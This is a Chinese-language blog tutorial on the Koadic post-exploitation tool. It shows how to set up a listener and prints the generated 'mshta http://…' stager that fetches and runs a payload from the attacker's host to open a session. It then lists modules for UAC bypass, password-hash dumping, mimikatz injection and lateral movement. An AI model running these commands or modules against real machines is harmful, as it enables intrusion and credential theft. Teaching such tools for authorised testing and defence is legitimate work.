2. 程式人生 > 其它 >後滲透工具Koadic:你真的瞭解我嗎?

後滲透工具Koadic:你真的瞭解我嗎?

阿新 發佈:2022-04-28

前言:

在朋友的部落格上看到推薦的一款工具Koadic,我接觸了以後發現很不錯這款工具的強大之處我覺得就是拿到shell後的各種模組功能,我就自己寫出來發給大家看看吧。

首先把專案克隆到本地:

專案地址

https://github.com/zerosum0x0/koadic.git

然後解壓,如果你要安裝到你指定的目錄就先cd到那個目錄在下載,我是複製到那了,所以我解壓。如下圖

執行koadic

cd koadic-master/ //cd到軟體目錄 sudo ./koadic //用最高許可權執行koadic

開啟Koadic,顯示需要設定的內容

下圖命令如下

(koadic: sta/js/mshta)# info     //

檢視需要設定的內容

檢視工具使用幫助

(koadic: sta/js/mshta)# help

大佬跳過我的翻譯,英語很渣而且是全靠感覺翻譯的(很辛苦,靠經驗和百度翻譯蒙)

(koadic: sta/js/mshta)# help //幫助的意思 COMMAND DESCRIPTION 命令 描述 ——— ————- load reloads all modules //顯示 info shows the current module options//顯示當前模組選項。 use switch to a different module//切換到不同的模組 set sets a variable for the current module//為當前模組設定一個變數 jobs shows info about jobs//顯示有關工作的資訊 help displays help info for a command//獲取一個cmdshell cmdshell command shell to interact with a zombie// 命令 shell 與殭屍互動 kill shows info about jobs//顯示有關工作的資訊 listeners shows info about stagers//顯示資訊的傳輸器載荷 exit exits the program//退出 zombies lists hooked targets//顯示所有殭屍會話 run runs the current module//執行,和exploit一個樣 verbose exits the program//退出程式

進入主題 ,開始設定。聽著是不是熱血沸騰要往下看了,哈哈。其實沒啥要講的,你只需要set lhost

這個命令大家應該都懂得,就是設定本地ip。

如下圖

注意看,他生成了一個網址,

其實這是一個惡意網址,裡面裝載了exploit

最後生成的利用命令如下

mshta http://192.168.0.105:9999/S8QoC

利用方法是放到cmd裡面執行

如下圖

其實你可以看到他彈出了事件檢視器我也不知道為什麼,不是我點開的啊,

也可能會好奇mshta是什麼意思,正解如下

mshta.exe是微軟Windows作業系統相關程式,用於執行.HTA檔案

我想就是這樣利用的吧

那麼當目標主機執行這個命令的時候,我們這邊就反彈回來了會話 會話ID為0

如下圖

如果是用其他複製批量執行了這個命令,會話比較多的話可以執行zombies來檢視左右會話,並選擇id進行控制

然後如果我這裡想獲取一個cmdshell的話,方法如下

cmdshell ID 我這裡應該是 cmdshell 0

如下圖

當然這怎麼能算得上好用的後滲透呢,這怎麼能滿足大家呢

當然了,上面只是普通操作,普通操作,所謂後滲透,在下面,

慢慢看嘛,這個後滲透工具值得上榜的原因我認為有幾條

1.環境要求不高 2.操作很簡單 3.提供的後滲透模組很實用豐富

後滲透模組我就不一個一個講了,設定都很簡單

我主要給你們說一下名字

  1. Hooks a zombie
  2. Elevates integrity (UAC Bypass)
  3. Dumps SAM/SECURITY hive for passwords
  4. Scans local network for open SMB
  5. Pivots to another machine

Stagers(傳輸器載荷)

Stagers hook target zombies and allow you to use implants.

傳輸器載荷可以 hook 目標殭屍,進而方便使用植入。

Module

Description

stager/js/mshta

可以使用HTML的應用程式在記憶體中的有效載荷mshta.exe

stager/js/regsvr

可以使用regsvr32.exe COM+指令碼記憶體負載

stager/js/rundll32_js

serves payloads in memory using rundll32.exe 可以使用rundll32.exe記憶體負載

stager/js/disk

serves payloads using files on disk 使用磁碟上的檔案提供有效載荷

Implants(

Implants start jobs on zombies.

Implants 在殭屍上執行。

Module

Description

implant/elevate/bypassuac_eventvwr

Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.使用enigma0x3的eventvwr.exe漏洞繞過UAC的Windows 7, 8,和10。

implant/elevate/bypassuac_sdclt

Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.使用enigma0x3的sdclt.exe漏洞繞過UAC的Windows 10。

implant/fun/zombie

Maxes volume and opens The Cranberries YouTube in a hidden window.長量和隱藏的視窗開啟小紅莓YouTube。

implant/fun/voice

Plays a message over text-to-speech.在文字到語音之間傳遞資訊。

implant/gather/clipboard

Retrieves the current content of the user clipboard.檢索使用者剪貼簿的當前內容。

implant/gather/hashdump_sam

Retrieves hashed passwords from the SAM hive.從SAM hive檢索密碼。

implant/gather/hashdump_dc

Domain controller hashes from the NTDS.dit file.域控制器hashes從NTDS。說檔案。

implant/inject/mimikatz_dynwrapx

Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).注入一個反射載入的DLL來執行powerkatz。dll(使用動態包裝器X)。

implant/inject/mimikatz_dotnet2js

Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).注入一個反射載入的DLL來執行powerkatz。dll(@tirannido DotNetToJS)。

implant/inject/shellcode_excel

Runs arbitrary shellcode payload (if Excel is installed).執行任意的shell程式碼有效負載(如果已經安裝了Excel)。

implant/manage/enable_rdesktop

Enables remote desktop on the target.在目標上啟用遠端桌面。

implant/manage/exec_cmd

Run an arbitrary command on the target, and optionally receive the output.在目標上執行任意命令,並可選地接收輸出。

implant/pivot/stage_wmi

Hook a zombie on another machine using WMI.用WMI把殭屍掛在另一臺機器上。

implant/pivot/exec_psexec

Run a command on another machine using psexec from sysinternals.使用sysinternals中的psexec在另一臺機器上執行一個命令。

implant/scan/tcp

Uses HTTP to scan open TCP ports on the target zombie LAN.使用HTTP掃描目標殭屍網路上的TCP埠。

implant/utils/download_file

Downloads a file from the target zombie.從目標殭屍下載一個檔案

implant/utils/upload_file

Uploads a file from the listening server to the target zombies.上傳一個從監聽伺服器到目標殭屍的檔案

Disclaimer 宣告

程式碼示例僅供教育參考,因為只有研究攻擊者使用的攻擊手段,才能建立足夠強大的防禦體系。 在未經事先許可的情況下使用此程式碼對目標系統進行操作是非法的,作者對此不負任何責任。

有不好的地方請指出

相關推薦

滲透工具Koadic真的瞭解

前言 在朋友的部落格上看到推薦的一款工具Koadic接觸了以後發現很不錯這款工具的強大之處覺得就是拿到shell的各種模組功能,就自己寫出來發給大家看看吧。

滲透工具Empire使用教程

一、前言 Empire是一個PowerShell後期漏洞利用代理工具同時也是一款很強大的後滲透測神器,它建立在密碼學、安全通訊和靈活的架構之上。Empire實現了無需powershell.exe就可執行PowerShell代理的功能。快速部署後期漏

面試官真的瞭解Redis分散式鎖

什麼是分散式鎖 說到Redis,我們第一想到的功能就是可以快取資料,除此之外,Redis因為單程序、效能高的特點,它還經常被用於做分散式鎖。

真的瞭解JMM

引言 在現代計算機中,cpu的指令速度遠超記憶體的存取速度,由於計算機的儲存裝置與處理器的運算速度有幾個數量級的差距,所以現代計算機系統都不得不加入一層讀寫速度儘可能接近處理器運算速度的快取記憶體(Cac

JS中的const命令懂它

const 定義 const宣告一個只讀的常量 。一旦宣告, 常量的值就不能改變。 常量 所謂的常量就是不能改變的值

真的瞭解synchronized不信瞭解到這個程度

在多執行緒併發程式設計中synchronized一直是元老級角色,很多人都會稱呼它為重量級鎖。但是,隨著Java SE 1.6對synchronized進行了各種優化之後,有些情況下它就並不那麼重了。本文詳細介紹java1.6中為了減少 synch

歐盟36位議員質問貝佐斯在監視我們

歐洲議會 36 位議員致信亞馬遜CEO 貝佐斯,質問他的公司是否正在僱傭情報人員監視歐盟政治家、工會會員和亞馬遜員工。

Java String 物件(真的瞭解)

String 物件的實現 String物件是 Java 中使用最頻繁的物件之一,所以 Java 公司也在不斷的對String物件的實現進行優化,以便提升String物件的效能,看下面這張圖,一起了解一下String物件的優化過程。

Gamma、Linear、sRGB 和Unity Color Space,懂了

“為什麼渲染出來的場景,總是感覺和真實世界不像呢?” 遊戲從業者或多或少都聽過Linear、Gamma、sRGB和伽馬校正這些術語,網際網路上也有很多科普的資料,但是它們似乎又都沒有講很\"清楚\"。

真的瞭解 IP ,PHP 如何嚴格獲取真實使用者 IP?

PHP 裡用來獲取客戶端 IP 的變數有這些: $_SERVER[\'HTTP_CLIENT_IP\']這個頭是有的,但是很少,不一定伺服器都實現了。客戶端可以偽造。

foreach 怎麼給第一條資料加上selected_真的瞭解foreach

技術標籤foreach 怎麼給第一條資料加上selected 引言 有C#基礎的,當問到迴圈有哪些,會毫不猶豫的說出的for、do while、foreach及while這幾種,但是到具體實際開發中,我們遇到一些問題,比如到底選擇哪種

springmvc返回錯誤狀態碼_面試官能給談談Spring MVC的異常處理機制

技術標籤springmvc返回錯誤狀態碼 前言 SpringMVC是目前主流的Web MVC框架之一。 本文將分析SpringMVC的異常處理內容,讓讀者瞭解SpringMVC異常處理的設計原理。

Android開發經驗談有過迷茫?2021最新版!

開頭 大家都知道,找工作的時候高薪不好拿,一般人能拿 30k 的 offer 就不錯了。據所知百分之九十的Android開發都在30k以下!?

真的瞭解PCM

> 實現音訊PCM錄製的Github地址https://github.com/crazydog-ki/MMSesssion # 什麼是PCM?

Xbox和麥當勞玩梗互動 麥當勞想把也收購了

近日,微軟宣佈收購動視暴雪,這次收購將花費微軟687億美元,預計將在2023年完成。這一訊息震驚了遊戲圈,玩家對此的反映就是各種梗和梗圖,但做梗圖玩梗不僅僅是玩家,官方也在玩梗互動。

為什麼雲瑾她是副C而不是輔助,真的瞭解

實屬興致來了,就出了這期專欄攻略,帶萌新認清真正的雲瑾。 有很多人都認為雲瑾是輔助啊,這實屬一個誤區,雲瑾是陪著申鶴一起出來的,她們兩個是擁有相同機制的副C(新機制),為什麼她們是副C往下看就明白說的對

Enumy一款功能強大的Linux滲透提權列舉工具

Enumy是一款功能強大的Linux後滲透提權列舉工具,該工具是一個速度非常快的可移植可執行檔案,廣大研究人員可以在針對Linux裝置的滲透測試以及CTF的後滲透階段利用該工具實現許可權提升,而Enumy執行之後將能夠幫助

OpenCV開發筆記(六十五)紅胖子8分鐘帶深入瞭解ORB特徵點(圖文並茂+淺顯易懂+程式原始碼)

若該文為原創文章,未經允許不得轉載原博主部落格地址https://blog.csdn.net/qq21497936原博主部落格導航https://blog.csdn.net/qq21497936/article/details/102478062本文章部落格地址https://blog.csdn.net

面試官剛說喜歡研究新技術,那麼請說說對 Blazor 的瞭解

閱讀本文大概需要 1.5 分鐘。 最近在幾個微信 .NET 交流群裡大家討論比較頻繁的話題就是這幾天自己的面試經歷。

RaiDrive 網盤對映工具體驗免費給的電腦「擴容」

這個時代,就是萬物皆可「雲」的時代,我們對各種各樣的雲服務並不陌生。雲盤的優勢,在於不需要實體硬體,即可將資料安全隨身地攜帶;但它的缺點就在於必須下載軟體使用,如果是個重度雲盤使用者,可能還會有好幾